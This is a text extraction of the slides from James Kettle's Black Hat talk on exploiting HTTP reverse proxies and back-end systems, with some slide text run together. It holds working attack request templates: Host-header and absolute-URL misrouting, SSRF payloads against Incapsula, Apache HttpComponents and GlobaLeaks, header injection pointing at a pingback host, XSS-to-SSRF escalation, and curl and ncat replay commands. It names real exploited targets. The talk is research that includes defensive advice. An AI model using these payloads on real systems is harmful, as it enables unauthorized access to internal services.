CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied •...
Transcript of CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied •...
![Page 1: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/1.jpg)
CRACKINGTHELENS
JamesKettle
EXPLOITINGHTTP'SHIDDENATTACK-SURFACE
![Page 2: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/2.jpg)
AnUnexpectedPingback– cloud.mail.ru/imgur.com
Pingbackfrombn-proxy1a.ealing.ukcore.bt.net
predator.alien.bt.co.uk
cloud.mail.ru:80(HTTP) cloud.mail.ru:443(HTTPS)258bytes|52millis
![Page 3: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/3.jpg)
![Page 4: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/4.jpg)
Outline
• SpeculativeAttackPipeline•MisroutingRequests
• TargetingAuxiliarySystems
• Demo
• Q&A
![Page 5: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/5.jpg)
Speculative AttackPipeline
![Page 6: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/6.jpg)
• DNSListener• BurpCollaboratorClient•PrivateCollaboratorserverrecommended
• Rollyourown• Canarytokens
Listening
![Page 7: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/7.jpg)
InvitingResponses
• Burpmatch/replace• Nocorrelation
• CollaboratorEverywhere• Masscan• NoHTTP/1.1orSSL/TLS
• ZMap/ZGrab
![Page 8: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/8.jpg)
LazilyAssemblinganAudience
HackerOne BugCrowd
ScopeRegex 3millhosts
DNSDatabase
ProjectSonar
50kwebservers
ipaddress,hostname
Suitabletargetspreadsheet
Profit
![Page 9: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/9.jpg)
MaximizingAttackSurface
GET / HTTP/1.1Host: {host1, host2, host3}X-Forwarded-Proto: {HTTPS, HTTP}Cache-Control: no-transformMax-Forwards: {1, 2, 3}
![Page 10: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/10.jpg)
MisroutingRequests
REVERSEPROXY
PUBLICAPP
INTERNALAPP
![Page 11: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/11.jpg)
MisroutingRequests
GET / HTTP/1.1Host: id.burpcollaborator.net
Exploited:• 27DoDservers• ats-vm.lorax.bf1.yahoo.com•MyISP• ColombianISPdoingDNSpoisoning
![Page 12: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/12.jpg)
ats-vm.lorax.bf1.yahoo.com1/3
![Page 13: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/13.jpg)
ats-vm.lorax.bf1.yahoo.com2/3
![Page 14: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/14.jpg)
ats-vm.lorax.bf1.yahoo.com3/3
+15,000+5,000$20,000
![Page 15: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/15.jpg)
• AllTCP/80traffictoblacklistedIPsgetsproxied• MasksallincomingBTtraffic
• /0traceroute(ttl=10)• Caches,self-hostedsites,speedtests,andblacklistedIPs
InvestigatingIntent- BT
GET/HTTP/1.1Host:www.icefilms.info
HTTP/1.1200OK…<p>Accesstothewebsiteslistedonthispagehasbeenblockedpursuanttoordersofthehighcourt.</p>
GEThttp://104.31.17.3/HTTP/1.1Host:www.icefilms.info
HTTP/1.1200OK…<title>IceFilms.info - QualityDivXMovies</title>
![Page 16: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/16.jpg)
• vk.com pingbackfrom200.89.96.13
• DNSpoisoningimagehosts,socialnetworks
• andbbc.co.uk• Whicharticles?• Perspectives/Convergence• BackslashPoweredDiffing,ETag
InvestigatingIntent- METROTEL
"healthyinternet"
![Page 17: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/17.jpg)
InputMangling
GET / HTTP/1.1Host: vcap.me
GET /vcap.me/vcap.meHost: outage.vcap.meVia: o2-b.ycpi.tp2.yahoo.net
GET / HTTP/1.1Host: ../?x=.vcap.me
GET /vcap.me/../?x=.vcap.meHost: outage.vcap.meVia: o2-b.ycpi.tp2.yahoo.net
+5,000$25,000
![Page 18: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/18.jpg)
AbsoluteURLs
GET http://blah/ HTTP/1.1Host: one.mil
Ifyou'relookingatthisandarenotinthemilitaryorDoDthiswon'tmeananythingtoyou,norwillyoubeabletoaccessit….
![Page 19: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/19.jpg)
Incapsula:hostname:ignoredPort
Backend:http://user:pass@hostname/
AmbiguousExploits- Incapsula
GET / HTTP/1.1Host: incap-client:[email protected]
![Page 20: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/20.jpg)
ApacheHttpComponents
Url backendURL = "http://backend-server/";String uri = ctx.getRequest().getRawUri();
URI proxyUri = new URIBuilder(uri).setHost(backendURL.getHost()).setPort(backendURL.getPort()) .build();
GET @burpcollab.net/ HTTP/1.1
http://[email protected]/
![Page 21: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/21.jpg)
GET @burpcollaborator.net/ HTTP/1.1
Service-Gateway-Is-Newrelic-Admin:false
+8,000$33,000
![Page 22: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/22.jpg)
GlobaLeaks
GET xyz.burpcollaborator.net:80/ HTTP/1.1Host: demo.globaleaks.org
SSRFthroughTor
xYZ.BurpcoLLABoRaTOR.neT. from 89.234.157.254Xyz.burPColLABorAToR.nET. from 62.210.18.16xYz.burpColLaBorATOR.net. from 91.224.149.254
![Page 23: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/23.jpg)
ExploitingAuxiliarySystems
PUBLICAPP BACKEND
ATTACKERAPP
![Page 24: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/24.jpg)
"TheX-Wap-ProfileheadershouldcontainaURLpointingtoanXMLdocumentspecifyingthefeaturesofamobiledevice"
![Page 25: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/25.jpg)
Decloaking BackendSystems
GET /?a=f.collab.net&a=f.collab.net HTTP/1.1Host: www.facebook.comX-WAP-Profile: http://a.collab.net/wap.xmlReferer: http://b.collab.net/refX-Forwarded-For: c.collab.netTrue-Client-IP: d.collab.netX-Real-IP: e.collab.netConnection: close
![Page 26: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/26.jpg)
• URL&Redirecthandling• Auto-authentication- Responder.py• ClientHeartbleed– pacemaker.py
• TCP/IPfingerprinting– p0f• SSLciphers,certvalidation
ExploitingRemoteClients
![Page 27: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/27.jpg)
• Pingbackinception• SprayRCEacrossLAN
• Whatifthey'rerendering?• SprayXSSacrossLAN- BlindReflectedServer-SideXSS(BRSSXSS)• XSS/proc/self/environ
• DotheysupportJavaScript?OrCSS?DotheyenforcetheSOP?CanImakepopups?WhataboutFlash?
ExploitingRemoteClients
![Page 28: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/28.jpg)
RenderingEngineHackability Probe
JavaScriptenvironmentdifference:core,__core-js_shared__,System…
![Page 29: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/29.jpg)
• Load<historyofblimps>
• NoteGET/blimps/F-1.pngHTTP/1.1
• Scanningresponseforresourceimports
Pre-emptiveCaching
GET / HTTP/1.1Host: burpcollaborator.net
GET /jquery.js HTTP/1.1GET /wildcat.jpg HTTP/1.1
https://www.history.navy.mil/our-collections/photography/numerical-list-of-images/nhhc-series/nh-series/NH-43000/NH-43487.html
![Page 30: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/30.jpg)
EscalatingXSStoSSRF
REVERSEPROXY
PUBLICAPP
INTERNALAPP
![Page 31: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/31.jpg)
EscalatingXSStoSSRF
ATTACKER PROXY PUBLICAPP INTERNALPOST /XSS.cgi
<img src="http://internal/index.php/a.jpg">
GET /index.php/a.jpg
Sensitive content
GET /index.php/a.jpgHost: internal
Sensitive content
![Page 32: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/32.jpg)
DEMO
![Page 33: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/33.jpg)
• Reverseproxiesaregoingtoproxy• UseaDMZ
• Crawlersareemployeeswithantiquatedbrowsers
• whoclickeverything
• Welcomeresearchers• Haveabugbounty• Don'tforbidautomatedtesting(withcustomtools)
Defense
![Page 34: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/34.jpg)
Replicating
curl -H 'Host: internal' http://example.com/
echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n' | ncat example.com 80| openssl s_client -ign_eof -connect 7.7.7.7:443
openssl s_client -servername qq.com -ign_eof -connect 7.7.7.7:443
https://github.com/PortSwigger/collaborator-everywherehttps://github.com/PortSwigger/hackability
![Page 35: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/35.jpg)
• ZGrab+Burp Collaboratorintegration
• X-WAP-Profile'sfriends
• Clientexploits
• Toolsforautomatedexploitation(especiallyblindSSRF)
• Untappedattacksurface• Theotherlayer
FurtherResearch
![Page 36: CRACKING THE LENS - Black Hat Briefings€¢All TCP/80 traffic to blacklisted IPs gets proxied • Masks all incoming BT traffic •/0 traceroute (ttl=10) • Caches, self-hosted sites,](https://reader030.fdocuments.in/reader030/viewer/2022032613/5ae7c75f7f8b9a08778ed15c/html5/thumbnails/36.jpg)
Bugbountiesenablewhitehat researchatscale
LoadbalancersareVPNsforthepublic
Crawlersareemployeeswhoclick
Takeaways
@albinowaxEmail:[email protected]